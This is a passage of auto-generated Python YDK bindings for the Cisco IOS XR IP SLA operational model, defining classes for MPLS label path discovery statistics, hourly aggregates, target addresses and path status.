**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Aggregated(Entity):
"""
Statistics aggregated for LPD group
collected over time intervals
.. attribute:: hours
Table of LPD statistics aggregated over 1\-hour intervals
**type**\: :py:class:`Hours <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated, self).__init__()
self.yang_name = "aggregated"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("hours", ("hours", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.hours = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours()
self.hours.parent = self
self._children_name_map["hours"] = "hours"
self._children_yang_names.add("hours")
self._segment_path = lambda: "aggregated"
class Hours(Entity):
"""
Table of LPD statistics aggregated over
1\-hour intervals
.. attribute:: hour
LPD statistics aggregated for a 1\-hour interval
**type**\: list of :py:class:`Hour <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours, self).__init__()
self.yang_name = "hours"
self.yang_parent_name = "aggregated"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("hour", ("hour", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour))])
self._leafs = OrderedDict()
self.hour = YList(self)
self._segment_path = lambda: "hours"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours, [], name, value)
class Hour(Entity):
"""
LPD statistics aggregated for a 1\-hour
interval
.. attribute:: hour_index (key)
Hour Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: target_address
LPD target
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress>`
.. attribute:: start_time
LPD start time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
LPD return code
**type**\: :py:class:`IpslaMplsLpdRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdRetCode>`
.. attribute:: completion_time_count
Number of CompT samples
**type**\: int
**range:** 0..4294967295
.. attribute:: completion_time
LPD Completion time
**type**\: int
**range:** 0..4294967295
.. attribute:: min_completion_time
Minimum CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_completion_time
Maximum CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_completion_time
Sum of CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: path_count
Number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: min_path_count
Minimum number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: max_path_count
Maximum number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of successes
**type**\: int
**range:** 0..4294967295
.. attribute:: no_path_count
Number of failures due to no path
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_broken_count
Number of failures due to all paths broken
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_unexplorable_count
Number of failures due to all paths unexplorable
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_broken_or_unexplorable_count
Number of failures due to all paths broken or unexplorable
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of failures due to timeout
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of failures due to internal error
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Number of failures due to unknown cause
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour, self).__init__()
self.yang_name = "hour"
self.yang_parent_name = "hours"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hour_index']
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('hour_index', YLeaf(YType.int32, 'hour-index')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('completion_time_count', YLeaf(YType.uint32, 'completion-time-count')),
('completion_time', YLeaf(YType.uint32, 'completion-time')),
('min_completion_time', YLeaf(YType.uint32, 'min-completion-time')),
('max_completion_time', YLeaf(YType.uint32, 'max-completion-time')),
('sum_completion_time', YLeaf(YType.uint32, 'sum-completion-time')),
('path_count', YLeaf(YType.uint32, 'path-count')),
('min_path_count', YLeaf(YType.uint32, 'min-path-count')),
('max_path_count', YLeaf(YType.uint32, 'max-path-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('no_path_count', YLeaf(YType.uint32, 'no-path-count')),
('all_paths_broken_count', YLeaf(YType.uint32, 'all-paths-broken-count')),
('all_paths_unexplorable_count', YLeaf(YType.uint32, 'all-paths-unexplorable-count')),
('all_paths_broken_or_unexplorable_count', YLeaf(YType.uint32, 'all-paths-broken-or-unexplorable-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('unknown_count', YLeaf(YType.uint32, 'unknown-count')),
])
self.hour_index = None
self.start_time = None
self.return_code = None
self.completion_time_count = None
self.completion_time = None
self.min_completion_time = None
self.max_completion_time = None
self.sum_completion_time = None
self.path_count = None
self.min_path_count = None
self.max_path_count = None
self.ok_count = None
self.no_path_count = None
self.all_paths_broken_count = None
self.all_paths_unexplorable_count = None
self.all_paths_broken_or_unexplorable_count = None
self.timeout_count = None
self.internal_error_count = None
self.unknown_count = None
self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "hour" + "[hour-index='" + str(self.hour_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour, ['hour_index', 'start_time', 'return_code', 'completion_time_count', 'completion_time', 'min_completion_time', 'max_completion_time', 'sum_completion_time', 'path_count', 'min_path_count', 'max_path_count', 'ok_count', 'no_path_count', 'all_paths_broken_count', 'all_paths_unexplorable_count', 'all_paths_broken_or_unexplorable_count', 'timeout_count', 'internal_error_count', 'unknown_count'], name, value)
class TargetAddress(Entity):
"""
LPD target
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "hour"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Status(Entity):
"""
Operational status of LPD group
.. attribute:: lpd_paths
Operational path state in LPD group
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths>`
.. attribute:: state
Operational status of LPD group
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status, self).__init__()
self.yang_name = "status"
self.yang_parent_name = "lpd"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths)), ("state", ("state", Ipsla.OperationData.Operations.Operation.Lpd.Status.State))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.lpd_paths = Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths()
self.lpd_paths.parent = self
self._children_name_map["lpd_paths"] = "lpd-paths"
self._children_yang_names.add("lpd-paths")
self.state = Ipsla.OperationData.Operations.Operation.Lpd.Status.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._children_yang_names.add("state")
self._segment_path = lambda: "status"
class LpdPaths(Entity):
"""
Operational path state in LPD group
.. attribute:: lpd_path
Current operational path state in LPD group
**type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths, self).__init__()
self.yang_name = "lpd-paths"
self.yang_parent_name = "status"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath))])
self._leafs = OrderedDict()
self.lpd_path = YList(self)
self._segment_path = lambda: "lpd-paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths, [], name, value)
class LpdPath(Entity):
"""
Current operational path state in LPD
group
.. attribute:: path_index (key)
LPD path index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: path_id
LPD path identifier
**type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId>`
.. attribute:: path_status
Path status
**type**\: :py:class:`IpslaMplsLpdPathDiscoveryStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdPathDiscoveryStatus>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath, self).__init__()
self.yang_name = "lpd-path"
self.yang_parent_name = "lpd-paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
('path_status', YLeaf(YType.enumeration, 'path-status')),
])
self.path_index = None
self.path_status = None
self.path_id = Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId()
self.path_id.parent = self
self._children_name_map["path_id"] = "path-id"
self._children_yang_names.add("path-id")
self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath, ['path_index', 'path_status'], name, value)
class PathId(Entity):
"""
LPD path identifier
.. attribute:: lsp_selector
LSP selector
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: output_interface
Output interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9./\-]+
.. attribute:: nexthop_address
Nexthop address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: downstream_label
Downstream label stacks
**type**\: list of int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId, self).__init__()
self.yang_name = "path-id"
self.yang_parent_name = "lpd-path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
('output_interface', YLeaf(YType.str, 'output-interface')),
('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
])
self.lsp_selector = None
self.output_interface = None
self.nexthop_address = None
self.downstream_label = []
self._segment_path = lambda: "path-id"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class State(Entity):
"""
Operational status of LPD group
.. attribute:: target_address
Target for LPD
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress>`
.. attribute:: monitor_id
MPLSLM monitor ID
**type**\: int
**range:** 0..4294967295
.. attribute:: discovery_mode
Latest LPD mode
**type**\: :py:class:`IpslaMplsLpdDiscoveryModeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdDiscoveryModeEnum>`
.. attribute:: start_time
Latest start time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Latest return code
**type**\: :py:class:`IpslaMplsLpdRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdRetCode>`
.. attribute:: completion_time
Latest completion time
**type**\: int
**range:** 0..4294967295
.. attribute:: path_count
Number of discovered paths
**type**\: int
**range:** 0..4294967295
